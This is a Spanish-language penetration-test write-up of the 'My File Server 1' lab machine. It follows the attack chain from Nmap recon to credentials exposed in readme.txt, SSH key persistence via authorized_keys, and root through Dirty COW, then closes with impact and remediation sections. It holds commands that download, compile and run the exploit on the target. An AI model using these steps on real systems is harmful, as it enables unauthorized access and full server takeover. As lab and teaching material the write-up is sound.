ACTIVIDAD #9

Esta evaluación de seguridad se realizó sobre la máquina vulnerable My File Server 1, la cual simula un servidor corporativo de archivos en un entorno controlado. El ejercicio confirmó una cadena de compromiso completa: desde la exposición inicial de servicios y contraseñas hasta la obtención de privilegios de superusuario, por lo que el riesgo global del activo se clasifica como crítico.

La causa raíz del compromiso radica en la combinación de debilidades encadenables: exposición de información sensible por HTTP, reutilización de credenciales, falta de controles en servicios de transferencia y un kernel desactualizado susceptible a escalada de privilegios mediante Dirty COW. En un escenario real, esto permitiría el acceso no autorizado a documentos, alteración de información e interrupción operativa.

1. Alcance y restricciones del ejercicio

El análisis se enfocó de manera exclusiva en los siguientes parámetros de ejecución:

  • Sistema objetivo: My File Server 1 (Servidor de archivos).
  • Dirección IP analizada: 192.168.56.104.
  • Metodología de referencia: PTES y OWASP Testing Guide.
  • Herramientas principales: netdiscover, Nmap, enum4linux, smbclient, Nikto, FTP, SSH, uname, gcc y wget.
  • Restricciones: No se realizaron ataques de denegación de servicio (DoS) ni pruebas destructivas que afectaran infraestructura fuera del laboratorio académico.

2. Metodología aplicada (Flujo de decisión técnica)

La metodología se aplicó como un flujo dinámico donde cada hallazgo habilitó el paso siguiente de la intrusión:

Fase Objetivo Hallazgo clave Transición metodológica
Reconocimiento Identificar el host y mapear superficie expuesta. Detección de múltiples servicios abiertos (FTP, SSH, HTTP, RPC, SMB, NFS). Obligó a priorizar vectores con potencial de exposición de información.
Enumeración Profundizar en servicios y buscar evidencia accionable. HTTP permitió acceder a /readme.txt sin credenciales; SMB/NFS ampliaron el contexto. El archivo aportó credenciales válidas y justificó validar accesos en servicios autenticados.
Explotación Obtener acceso inicial reproducible. Credenciales smbuser / rootroot1 permitieron el ingreso y preparación de acceso remoto. Con acceso de usuario válido, se pudo verificar el sistema operativo para buscar escalada local.
Escalada Alcanzar los máximos privilegios en el host. El kernel 3.10.0-229.el7.x86_64 resultó vulnerable a Dirty COW (CVE-2016-5195). La explotación local permitió obtener contexto de root y el control total del servidor.

3. Fase de reconocimiento y escaneo de puertos

Se utilizó netdiscover para ubicar la IP objetivo (192.168.56.104) y posteriormente se lanzó un escaneo exhaustivo con Nmap: 

nmap -sS -sV -O -p- 192.168.56.104

Puertos críticos detectados para la priorización de vectores:

  • Puerto 80 (HTTP - Apache 2.4.6): Prioridad Crítica. Vector principal por exposición de contenido libre (origen del archivo readme.txt).
  • Puerto 445 (SMB - Samba 3.X-4.X) y Puerto 2049 (NFS): Prioridad Alta. Recursos compartidos en un servidor de archivos que denotaban administración laxa.
  • Puertos 21 (FTP - vsftpd) y 22 (SSH - OpenSSH 7.4): Prioridad Alta. Considerados canales de validación de credenciales y consolidación del acceso interactivo.

4. Enumeración y explotación del sistema

Durante la fase de enumeración profunda utilizando comandos de diagnóstico como nmap -sV, nikto y herramientas de recolección para Samba como enum4linux (instalada mediante sudo apt install enum4linux), se detectó la estructura de directorios web y los compartidos de red.

Secuencia cerrada de la explotación:

  1. Identificación del recurso expuesto: Se revisó el servicio HTTP y se localizó el archivo /readme.txt en texto plano, el cual almacenaba los secretos de acceso: smbuser / rootroot1.
  2. Validación de credenciales: Se probaron los datos obtenidos en el servicio FTP, logrando una autenticación exitosa que confirmó malas prácticas de reutilización de contraseñas.
  3. Persistencia de acceso remoto: En la máquina atacante se generó un par de llaves SSH y mediante el acceso previo se incrustó la clave pública dentro de las llaves autorizadas del usuario comprometido: 
    cat id_ed25519.pub > authorized_keys
  4. Acceso inicial por SSH: Se estableció una sesión interactiva estable como smbuser. Una vez dentro, se ejecutó uname -r para validar el entorno real, devolviendo el kernel 3.10.0-229.el7.x86_64.

5. Escalada de privilegios a Root (Dirty COW)

La versión de kernel identificada pertenece de forma directa a sistemas Linux afectados por la vulnerabilidad de condición de carrera CVE-2016-5195 (Dirty COW) en su mecanismo de copy-on-write.

Ejecución del exploit local:

Se descargó, compiló y ejecutó el código para forzar la elevación de privilegios:

							wget https://www.exploit-db.com/download/40616 -O cowroot.c
							gcc cowroot.c -o cowroot -pthread
							./cowroot

Tras la ejecución exitosa, el proceso modificó los privilegios de la sesión actual, otorgando un contexto con los privilegios máximos (root), lo cual se validó mediante el ingreso al directorio reservado /root y la lectura del archivo de banderas proof.txt.

6. Análisis de impacto (Modelo CIA)

  • Confidencialidad (Crítico): Fuga total de información corporativa y credenciales de administración en texto claro.
  • Integridad (Alto): Capacidad completa para modificar archivos del sistema, alterar bitácoras o sembrar software malicioso desde el rol de superusuario.
  • Disponibilidad (Alto): Posibilidad de borrar particiones completas, detener servicios críticos de la empresa o inutilizar el servidor permanentemente.

7. Recomendaciones técnicas y plan de remediación

  • Remediación Inmediata (Web y Credenciales): Retirar el archivo readme.txt del servidor web, prohibir el almacenamiento de secretos en texto claro y rotar de manera urgente la contraseña del usuario smbuser.
  • Remediación Alta (Endurecimiento de SSH y Red): Deshabilitar el acceso por contraseña para cuentas críticas en el archivo sshd_config, restringir el uso de authorized_keys y acotar los servicios SMB/NFS únicamente a los segmentos de red autorizados.
  • Remediación Alta (Parchado de Kernel): Actualizar el kernel del sistema operativo a una versión estable y soportada que mitigue de raíz la vulnerabilidad Dirty COW.
  • Remediación Media (Monitoreo): Centralizar las bitácoras (logs) de autenticación y transferencias de archivos en un sistema SIEM para identificar patrones anómalos a tiempo.

Conclusión

Este ejercicio demostró que la seguridad de un activo no depende de un solo control, sino de la solidez de toda la cadena de configuración. El eslabón más débil comenzó con una simple omisión en el servidor web (un archivo de texto olvidado) y culminó en la pérdida total del control del servidor de archivos debido a un sistema operativo desactualizado.

Garantizar revisiones periódicas de parches de seguridad y aplicar políticas estrictas de contraseñas robustas y únicas son requisitos indispensables para salvaguardar la infraestructura en un entorno empresarial real.

Referencias

  • Penetration Testing Execution Standard (PTES) Technical Guidelines: http://www.pentest-standard.org/
  • OWASP Web Security Testing Guide: https://owasp.org/www-project-web-security-testing-guide/
  • Exploit Database - Dirty COW race condition exploit (CVE-2016-5195): https://www.exploit-db.com/exploits/40616